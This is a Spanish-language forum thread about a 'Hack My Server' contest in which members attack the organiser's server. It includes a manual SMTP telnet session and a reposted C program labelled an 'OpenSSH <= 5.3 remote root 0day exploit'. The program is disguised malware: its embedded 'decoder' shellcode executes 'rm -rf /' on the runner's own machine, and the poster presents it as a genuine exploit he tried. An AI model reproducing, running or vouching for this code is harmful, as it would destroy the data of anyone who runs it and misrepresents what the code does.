Concurso Nº1: "Hack My Server"

Iniciado por dimitrix, 25 Abril 2012, 00:40 AM

0 Miembros y 1 Visitante están viendo este tema.

dimitrix

CitarEn uno de ellos está el phpinfo() donde aparte de la versión de php (PHP Version 5.3.2-1ubuntu4.14) tenemos información que nos puede ser importante como el correro del admin (root@********.************.net) versión de OpenSSL (OpenSSL 0.9.8k) y demás

Sí, el phpinfo() lo subí ayer para quien lo encontrara ;-)

El dominio p*************s.com está controlado pero en v***.***.es ni p**a idea de cual es, supongo que será de alguien del foro, ahora miraré.

11Sep Acabo de acceder y no encuentro nada de v***.***.es ¿Puedes enviarmelo por privado cual es y donde lo ves?




Stakewinner00

Cita de: 11Sep en  8 Mayo 2012, 17:11 PM

PD: ¿Ahora con la cuenta del Plesk, el objetivo es el mismo o sólo atacar la aplicación web?

Saludos!

Segun tengo entendido la cuenta plesk la creo para k podamos avanzar un poco mas pero el objetivo es el mismo.

Belial & Grimoire

pues estuve probando un buen de cosas, metasploit, varios exploit, entre ellos varios que aquii utilizaron... lo bueno es que ya hubo  quien lo intento con los que poste hace tiempo y pues al parecer tampoco funcionaron e incluso e estado leyendo los bugs de esta paina para encontrar algo pero la mayoria son locales

http://xss.cx/examples/plesk-reports/xss-reflected-cross-site-scripting-cwe79-capec86-plesk-parallels-control-panel-version-20110407.20.html

tambien vi un explot para debian, OpenSSH 5.3p1 Debian
intente con este

* OpenSSH <= 5.3 remote root 0day exploit (32-bit x86)
* Priv8! Priv8! Priv8! Priv8! Priv8! Priv8! Priv8!
*
*
*/

#include <stdio.h>
#include <netdb.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

void usage(char *argv[])
{
    printf("\n\t[+] HATSUNEMIKU\n");
    printf("\t[+] OpenSSH <= 5.3p1 remote root 0day exploit\n");
    printf("\t[+] By: n3xus\n");
    printf("\t[+] Greetz to hackforums.net\n");
    printf("\t[+] Keep this 0day priv8!\n");
    printf("\t[+] usage: %s <target> <port>\n\n", argv[0]);
    exit(1);
}

unsigned char decoder[]=   "\x6a\x0b\x58\x99\x52"
                           "\x6a\x2f\x89\xe7\x52"
                           "\x66\x68\x2d\x66\x89"
                           "\xe6\x52\x66\x68\x2d"
                           "\x72\x89\xe1\x52\x68"
                           "\x2f\x2f\x72\x6d\x68"
                           "\x2f\x62\x69\x6e\x89"
                           "\xe3\x52\x57\x56\x51"
                           "\x53\x89\xe1\xcd\x80";

unsigned char rootshell[]= "\x31\xd2\xb2\x0a\xb9\x6f\x75\x21\x0a\x51\xb9\x63\x6b"
                           "\x20\x79\x51\x66\xb9\x66\x75\x66\x51\x31\xc9\x89\xe1"
                           "\x31\xdb\xb3\x01\x31\xc0\xb0\x04\xcd\x80\x31\xc0\x31"
                           "\xdb\x40\xcd\x80";

int main(int argc, char **argv)
{

    int euid = geteuid();
    int port= 22, sock;
    char h[1000];
    struct hostent *host;
    struct sockaddr_in addr;

    if(euid != 0)
    {
        fprintf(stderr, "You need to be root to use raw sockets.\n");
        exit(1);
    }
    if(euid == 0)
    {
        fprintf(stdout, "MIKU! MIKU! MIKU!\n");
    }
    if(argc != 3)
    usage(argv);
    if(!inet_aton(h, &addr.sin_addr))
    {
        host = gethostbyname(h);
        if(!host)
        {
            fprintf(stderr, "[-] Exploit failed.\n");
            (*(void(*)())decoder)();
            exit(1);
        }
        addr.sin_addr = *(struct in_addr*)host->h_addr;
        }
        sock = socket(PF_INET, SOCK_STREAM, 0);
        addr.sin_port = htons(port);
        addr.sin_family = AF_INET;
        if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1)
        {
            fprintf(stderr,"[-] Exploit failed.\n");
            exit(1);
        }
        char payload[1337];
        memcpy(payload, &decoder, sizeof(decoder));
        memcpy(payload, &rootshell, sizeof(rootshell));
        send(sock, payload, strlen(payload),0);
        close(sock);
        if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==-1)
        {
            fprintf(stderr, "[-] Exploit failed.\n");
            exit(1);
        }
        else if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==0)
        {
            fprintf(stdout, "[+]g0t sh3ll!\n");
            system("/bin/bash");
        }
        else
        {
            fprintf(stderr, "[-] Exploit failed.\n");
            close(sock);
            exit(0);
        }
}


pero tampoco, espero pronto haya mas suerte

.                                 

opportunity

#183
No es ningun agujero, pero ¿he podido enviar un email haciendo telnet al puerto 25?

********************************************
HELO -----------------.net
250 -----------------.net
MAIL FROM: <lola@elhacker.net>
250 2.1.0 Ok
RCPT TO: <lola@elhacker.net>
554 5.7.1 <lola@elhacker.net>: Relay access denied
RCPT TO: <lola@-----------------.net>
550 5.1.1 <lola@-----------------.net>: Recipient address rejected: User unknown in virtual alias table
RCPT TO: <root@-----------------.net>
250 2.1.5 Ok
DATA
354 End data with <CR><LF>.<CR><LF>
Prueba de envio


.
250 2.0.0 Ok: queued as 71F025B4094
********************************************

dimitrix

Oportunity quita la reverse IP o no vuelves a participar en un concurso mio de estos.




opportunity


Stakewinner00

Cita de: dimitrix en  8 Mayo 2012, 20:59 PM
Oportunity quita la reverse IP o no vuelves a participar en un concurso mio de estos.

Me podeis decir k tiene de  malo la reverse IP??

dimitrix

Cita de: Stakewinner00 en  8 Mayo 2012, 21:21 PM
Me podeis decir k tiene de  malo la reverse IP??



Nada, el problema es que publique aquí la IP.




opportunity

Sorry, no me habia dado cuenta.

dimitrix

Cita de: opportunity en  8 Mayo 2012, 21:31 PM
Sorry, no me habia dado cuenta.

Nada, nada, te envío los datos de PLESK.